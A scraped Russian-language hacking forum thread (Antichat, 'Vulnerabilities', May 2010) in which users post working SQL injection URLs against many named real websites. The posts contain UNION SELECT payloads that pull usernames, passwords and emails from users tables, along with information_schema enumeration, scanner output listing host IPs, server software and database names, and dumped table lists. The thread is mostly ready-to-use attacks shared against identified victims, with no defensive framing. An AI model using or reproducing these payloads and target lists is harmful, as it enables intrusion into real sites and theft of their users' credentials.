ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12041  
Старый 04.05.2010, 22:34
Аватар для Greaves
Greaves
Новичок
Регистрация: 07.04.2007
Сообщений: 29
Провел на форуме:
457999

Репутация: -8
Post

Своеобразный вывод..
Код:
http://www.globalresearch.ca/index.p...t=va&aid=18768+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3,ve rsion(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8,9,0,1, 2,3,version(),5,6,7,8,9,0,1,2,3,version(),5,6,7,8, 9,0,1,2+limit+1,1--
Код:
http://artmaterial.ru/about.php?content=dealer&id=-1%20union%20select%201,2,3,user_login,user_passwor d,6,7,8,9,0,1,2%20from%20users+limit+1,1
 
Ответить с цитированием

  #12042  
Старый 04.05.2010, 22:46
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.spinter.net/page.php?id=-2+union+select+1,concat(user(),char(58),version(), char(58),database())
 
Ответить с цитированием

  #12043  
Старый 04.05.2010, 22:48
Аватар для KENT1994
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Цитата:
www.williambloom.com/pages.php?id=44UNION ALL SELECT 1,2,%String_Col%,4,5 and 'x'='x
Host IP: 83.223.101.10
Web Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8b mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.8
Powered-by: PHP/5.2.8
DB Server: MySQL >=5
Current DB: williamb_db



Цитата:
www.costasales.com/pages.php?id=168UNION ALL SELECT %String_Col%,2 and 'x'='x
Host IP: 87.106.251.143
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: costasales_csales


Цитата:
www.snakedancecondos.com/pages.php?id=18 18' AND %True_Expression% AND 'x'='x
Host IP: 209.188.112.4
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: snakedancecondos

Цитата:
www.thereddstone.com/pages.php?id=3UNION ALL SELECT 1,%String_Col%,3,4--
Host IP: 64.150.165.92
Web Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Powered-by: PHP/5.2.0-8+etch15
DB Server: MySQL >=5
Current DB: phpmy1_thereddstone_com

Цитата:
www.connexions-berkshire.org.uk/pages.php?id=230 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,%String_Col%,12,13,14--
Host IP: 217.77.176.23
Web Server: Zeus/4.2
Powered-by: PHP/4.4.2
DB Server: MySQL
Current DB: connexions-berkshire

Цитата:
www.brightworks.net/pages.php?id=leed AND %True_Expression% AND 'x'='x
Host IP: 98.129.111.2
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: brightworks_site


хакИр

+++

Последний раз редактировалось KENT1994; 04.05.2010 в 22:55..
 
Ответить с цитированием

  #12044  
Старый 04.05.2010, 23:04
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.novosarajevo.ba/stream/article.php?pid=-301+union+select+1,2,3,aes_decrypt(aes_encrypt(con cat(user(),char(32,58,32),version(),char(32,58,32) ,database()),1),1),5,6,7,8,9,10,11,12,13,14,15,16, 17,18--
 
Ответить с цитированием

  #12045  
Старый 04.05.2010, 23:22
Аватар для KENT1994
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Цитата:
www.col3negoriginal.com/pages.php?id=14 UNION ALL SELECT 1,%String_Col%,3 and 'x'='x
Host IP: 85.25.124.18
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6

DB Server: MySQL unknown ver
Current DB: lasantha_col3neg

Цитата:
www.huronperthrentals.ca/pages.php?id=2 UNION ALL SELECT 1,%String_Col%,3--
Host IP: 69.41.197.19
Web Server: Apache/2.2.3 (CentOS)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: rentals

Цитата:
www.ccop.org/pages.php?id=38 AND %True_Expression% AND 'x'='x
Host IP: 216.92.217.5
Web Server: Apache/2.2.14
Powered-by: PHP/5.2.11
DB Server: MySQL >=5
Current DB: kinnon_ccop

Цитата:
www.fetalmonitors.biz/pages.php?ID=13 AND %True_Expression%
Host IP: 74.55.84.245
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.2
Powered-by: PHP/4.4.8
DB Server: MySQL >=5
Current DB: tiyanak_cmsorig

Цитата:
www.turkishculture.org/pages.php?ParentID=14&ID=70 AND %True_Expression% AND 'x'='x
Host IP: 209.197.125.227
Web Server: Apache/2.2.15
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: turkish2_tcp

Цитата:
cmrc.ucc.ie/pages/K_staff_page.php?id=27 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 143.239.1.112
Web Server: Apache/2.0.52 (Red Hat)
Powered-by: PHP/4.3.9
DB Server: MySQL >=4.1
Current DB: cmrc

Цитата:
www.sochi-international.ru/pages.php?id=2 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8,9,10,11 and 'x'='x
Host IP: 77.222.40.36
Web Server: Apache/1.3.37-lk.a (Unix) mod_defer/0.1.lk mod_python/2.7.11 Python/2.4.3 PHP/4.4.4 mod_dp/lk.0.4.4
Powered-by: PHP/4.4.4
DB Server: MySQL >=5
Current DB: sochiinr

Цитата:
http://www.starfiredirect.com/pages.php?id=5 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8--
Host IP: 66.147.249.135
Web Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8l DAV/2 mod_auth_passthrough/2.1 FrontPage/5.0.2.2635
Powered-by: PHP/5.2.11
DB Server: MySQL unknown ver
Current DB: starfir3_starfiredb

Цитата:
cmrc.ucc.ie/pages/K_staff_page.php?id=27 UNION ALL SELECT 1,%String_Col%,3,4,5,6,7,8,9,10,11,12 and 'x'='x
Host IP: 143.239.1.112
Web Server: Apache/2.0.52 (Red Hat)
Powered-by: PHP/4.3.9
DB Server: MySQL >=4.1
Current DB: cmrc

Цитата:
www.starting-gate.com/pages.php?id=26 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7,8 and 'x'='x
Host IP: 69.163.243.21
Web Server: Apache
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: 361641_startinggate

Последний раз редактировалось KENT1994; 04.05.2010 в 23:37..
 
Ответить с цитированием

  #12046  
Старый 04.05.2010, 23:28
Аватар для aka_zver
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.portalcoquimbo.cl
ТИЦ: 10
PR: 4
Пример запроса:
Код:
http://www.portalcoquimbo.cl/index3.php?id=-826+union+select+1,concat_ws(0x0b,version(),database(),user(),@@version_compile_os),now(),group_concat(0x0b,table_name),5,6+from+information_schema.tables--+
version - 5.0.90-community-log
database - portalco_portal
user - portalco_portal@localhost
os - unknown-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
bandeja,   
boletinu,   
categories,   
categories_description,   
cities,   
clasificados,   
comentarios,   
comentarios_corr,   
configuration,   
configuration_group,   
contenido_pg_en,   
contenido_pg_es,   
corresponsal_web,   
encuestas_campos,   
encuestas_encuestas,   
encuestas_respuestas,   
foro_categorias,   
foro_foros,   
foro_respuestas,   
foro_temas,   
galeria,   
galerias,   
gente_online,   
ibf_admin_logs,   
ibf_admin_permission_keys,   
ibf_admin_permission_rows,   
ibf_admin_sessions,   
ibf_announcements,   
ibf_attachments,   
ibf_attachments_type,   
ibf_badwords,   
ibf_banfilters,   
ibf_bulk_mail,   
ibf_cache_store,   
ibf_cal_calendars,   
ibf_cal_events,   
ibf_calendar_events,   
ibf_components,   
ibf_conf_settings,   
ibf_conf_settings_titles,   
ibf_contacts,   
ibf_custom_bbcode,   
ibf_dnames_change,   
ibf_email_logs,   
ibf_emoticons,   
ibf_faq,   
ib
columns:


Код:
CHARACTER_SET_NAME,   
DEFAULT_COLLATE_NAME,   
DESCRIPTION,   
MAXLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
ID,   
IS_DEFAULT,   
IS_COMPILED,   
SORTLEN,   
COLLATION_NAME,   
CHARACTER_SET_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
COLUMN_DEFAULT,   
IS_NULLABLE,   
DATA_TYPE,   
CHARACTER_MAXIMUM_LENGTH,   
CHARACTER_OCTET_LENGTH,   
NUMERIC_PRECISION,   
NUMERIC_SCALE,   
CHARACTER_SET_NAME,   
COLLATION_NAME,   
COLUMN_TYPE,   
COLUMN_KEY,   
EXTRA,   
PRIVILEGES,   
COLUMN_COMMENT,   
GRANTEE,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
PRIVILEGE_TYPE,   
IS_GRANTABLE,   
CONSTRAINT_CATALOG,   
CONSTRAINT_SCHEMA,   
CONSTRAINT_NAME,   
TABLE_CATALOG,   
TABLE_SCHEMA,   
TABLE_NAME,   
COLUMN_NAME,   
ORDINAL_POSITION,   
POSITION_IN_UNIQUE_CONSTRAINT,
REFERENCED_TABLE_SCHEMA,   
REFERENCED_TABLE_NAME,   
REFERENCED_COLUMN_NAME,   
QUERY_ID,   
SEQ,   
STATE,   
DURATION,   
CPU_USER,   
CPU_SYSTEM,   
CONTEXT_VOLUNTARY,   
CONTEXT_INVOLUNTARY,   
BLOCK_OPS_IN,   
BLOCK_OPS_OUT,   
MESSAGES_SENT,   
MESSAGES_RECEIVED,   
PAGE_FAULTS_MAJOR,   
PAGE_FAULTS_MINOR,   
SWAPS,   
SOURCE_FUNCTION,   
SOURCE_FILE,   
SO

Последний раз редактировалось aka_zver; 06.05.2010 в 17:29..
 
Ответить с цитированием

  #12047  
Старый 04.05.2010, 23:37
Аватар для Konqi
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://lifestyle.bosnia.ba/index.php?sta=3&pid=-13817+union+select+1,concat_ws(0x3a,user(),version (),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31--
 
Ответить с цитированием

  #12048  
Старый 04.05.2010, 23:58
Аватар для KENT1994
KENT1994
Участник форума
Регистрация: 25.09.2009
Сообщений: 147
Провел на форуме:
1768674

Репутация: 65
По умолчанию

Цитата:
www.ankenyalumni.org/pages.php?id=54 UNION ALL SELECT 1,2,%String_Col%,4,5,6,7--
Host IP: 199.108.163.173
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.1.6
DB Server: MySQL >=5
Current DB: ankenyalumni

Цитата:
www.rhinos.com.au/pages.php?id=4 UNION ALL SELECT 1,%String_Col%,3,4--
Host IP: 203.80.162.200
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
Powered-by: PHP/5.2.6
DB Server: MySQL >=4.1
Current DB: rhinos

Цитата:
www.brightworks.net/pages.php?id=workshops AND %True_Expression% AND 'x'='x
Host IP: 98.129.111.26
Web Server: Apache/2.2.3 (Red Hat)
Powered-by: PHP/5.2.13
DB Server: MySQL >=5
Current DB: brightworks_site

 
Ответить с цитированием

  #12049  
Старый 05.05.2010, 06:59
Аватар для Financier
Financier
Новичок
Регистрация: 12.12.2009
Сообщений: 5
Провел на форуме:
28808

Репутация: 9
По умолчанию

Код:
http://www.histonfc.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,version(),10,11+from+news--
Код:
http://www.ng2.co.uk/news.php?id=1&newsid=9999+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email)+from+users--
Код:
http://graysathletic.co.uk/news.php?id=9999+union+select+1,2,3,4,5,6,7,8,9,10,email+from+users/*
Код:
http://www.henleystandard.co.uk/news/news.php?id=99999+union+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables+limit+17,1--
adfeature_text adfeature_upsell archive archivemedia breaking_news
comments displayads editorial editorschoice emails faceforradio hsotv
jobs jobs_new lineage media notices schools schoolsnews sitsvac
Код:
http://www.airdrie007seacadets.co.uk/news.php?id=999+union+select+1,concat_ws(0x3a,name,pass,email),3,4,5,6,7,8,9+from+users--
Код:
http://lpoolcomp.co.uk/news.php?id=999+union+select+1,2,3,4,concat_ws(0x3a,username,password,email),6,7,8,9,10+from+users+limit+1,1--
Код:
http://www.wrightinvestments.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+17,1--
IP_LOG gen_sets sessions stoContact tblCommercialNews tblCommercialPages
tblContacts tblDesign tblEngineeringPages tblFinancePages tblFinanceTestimonials tblGallery tblInvestNews tblInvestPages 
tblLivingNews tblLivingPages tblLocationGallery tblMeta tblPDF tblPages blProperty tblSpec tblSpecGallery tblStoragePages tblStorageTestimonials tblSupplyPages tblTradePages tblTypes tblWri wlv_tblProperty wriContact
Код:
http://www.spygenius.co.uk/news.php?id=999+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+17,1--
advice alan_page audio_page gigs_page home_page links_page news_page photos_page press_page shop_page
Код:
http://www.prologisstafford.co.uk/news.php?id=18&newsid=999+union+select+1,2,3,4,5,6,concat_ws(0x3a,username,password,email)+from+users--
Код:
http://www.michaellaird.co.uk/michael-laird-news.php?id=7+union+select+1,2,3,4,5,6,table_name,8,9+from+information_schema.tables+limit+17,1--
awardcategories awards categories clients homebanner news pages people
photos portfolio press recruitment
Код:
http://www.beebeedevelopments.co.uk/news.php?id=9000019+union+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables+limit+17,1--
main pdf prop d spWebPartsSiteLog
Код:
http://www.lichfields.co.uk/news.php?id=99999+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17+from+clients--
Код:
http://www.physicaljerks.co.uk/news.php?id=99999+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14+from+information_schema.tables+limit+28,1--
GDN_Activity GDN_ActivityType GDN_Category GDN_Comment GDN_CommentWatch
GDN_Conversation GDN_ConversationMessage GDN_Discussion GDN_Draft GDN_Invitation GDN_Message GDN_Permission GDN_Photo GDN_Role GDN_ThemeSetting
GDN_User GDN_UserAuthentication GDN_UserConversation GDN_UserDiscussion GDN_UserRole LUM_Attachment LUM_Attachment LUM_Category LUM_CategoryBlock 
LUM_CategoryRoleBlock LUM_Comment LUM_Discussion LUM_DiscussionUserWhisperFrom LUM_DiscussionUserWhisperTo LUM_IpHistory
LUM_Notify LUM_Role LUM_Style LUM_User LUM_UserBookmark LUM_UserDiscussionWatc
Код:
http://www.bkbluebird.co.uk/news.php?id=9999+union+select+1,2,3,version(),5,6--

Последний раз редактировалось Financier; 08.05.2010 в 17:01..
 
Ответить с цитированием

  #12050  
Старый 05.05.2010, 13:17
Аватар для heretic1990
heretic1990
Постоянный
Регистрация: 02.07.2008
Сообщений: 472
Провел на форуме:
3728999

Репутация: 444
По умолчанию

Код:
http://www.oasis-gidro.ru/news.php?id=99+union+select+1,COLUMN_NAME,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x6f617a69735f7573657273+LIMIT+1,3%20--
u19255@10.10.223.208:u19255:5.0.67-log
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ